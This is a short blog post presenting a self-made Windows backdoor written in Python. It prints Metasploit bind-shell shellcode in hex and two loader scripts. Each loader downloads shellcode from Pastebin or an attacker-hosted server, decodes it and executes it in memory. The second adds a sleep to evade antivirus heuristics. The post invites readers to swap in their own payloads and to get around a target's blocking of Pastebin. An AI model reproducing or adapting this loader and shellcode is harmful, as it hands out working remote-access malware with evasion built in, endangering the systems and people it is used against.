Super Easy Ghetto Pastebin Malware

The following is a very simple backdoor I created in Python and compiled into a Windows binary using PyInstaller. The code downloads ASCII shellcode from a pastebin URL, interprets it as hex opcodes, injects it into memory, and executes it (without touching disk).

(I'm aware how primitive this is, but it got the job done)

Simply upload your shellcode to Pastebin, change the URL in the source code, and compile. Your shellcode should be in raw alphanumeric ASCII form, as follows:

fce8890000006089e531d2648b5230  
8b520c8b52148b72280fb74a2631ff  
31c0ac3c617c022c20c1cf0d01c7e2  
f052578b52108b423c01d08b407885  
c0744a01d0508b48188b582001d3e3  
3c498b348b01d631ff31c0acc1cf0d  
01c738e075f4037df83b7d2475e258  
8b582401d3668b0c4b8b581c01d38b  
048b01d0894424245b5b61595a51ff  
e0585f5a8b12eb865d683332000068  
7773325f54684c772607ffd5b89001  
000029c454506829806b00ffd55050  
50504050405068ea0fdfe0ffd59731  
db53680200115c89e66a10565768c2  
db3767ffd5535768b7e938ffffd553  
53576874ec3be1ffd5579768756e4d  
61ffd56a006a0456576802d9c85fff  
d58b366a406800100000566a006858  
a453e5ffd593536a005653576802d9  
c85fffd501c329c685f675ecc3  
#!/usr/bin/python

from ctypes import *  
import urllib2

URL = "http://pastebin.com/raw.php?i=48k0BXpq" # msfpayload windows/shell/bind_tcp LPORT=4444  
# modify that URL for whatever shellcode you want

downloader = urlopen(URL)  
paste = downloader.read()  
alphanumeric = paste.replace("\r\n", "")  
shellcode = bytearray.fromhex(alphanumeric)  
array = create_string_buffer(shellcode, len(shellcode))  
shell = cast(array, CFUNCTYPE(c_void_p))  
shell()  

*see bottom for source

I wrote another version of this script that downloads the raw shellcode data from a server that you specify, in case your target blocks Pastebin. I added base64 support and a sleep to outwait certain heuristic engines.

#!/usr/bin/python

from ctypes import *  
from base64 import b64decode  
from urllib import urlopen  
from time import sleep

URL = "http://server.com/evil.b64" # This should be changed to wherever you are hosting your malware package

downloader = urlopen(URL) # download the package  
shellcode = b64decode(downloader.read()) # de-base64 the shellcode  
sleep(31) # avoid time-based heuristics  
array = create_string_buffer(shellcode, len(shellcode))  
shell = cast(array, CFUNCTYPE(c_void_p))  
shell()  

This is not advanced, but it is effective.

Feel free to extend and modify this to fit your needs.

*Big thanks to TJ O'Connor for writing Violent Python. I highly recommend it to everyone. I took the shellcode casting portion of this code straight from his book.

Links:
Pyinstaller - http://www.pyinstaller.org/
Stupid Malware - https://github.com/andrew-morris/stupid_malware
Shell Paste - https://github.com/andrew-morris/shellpaste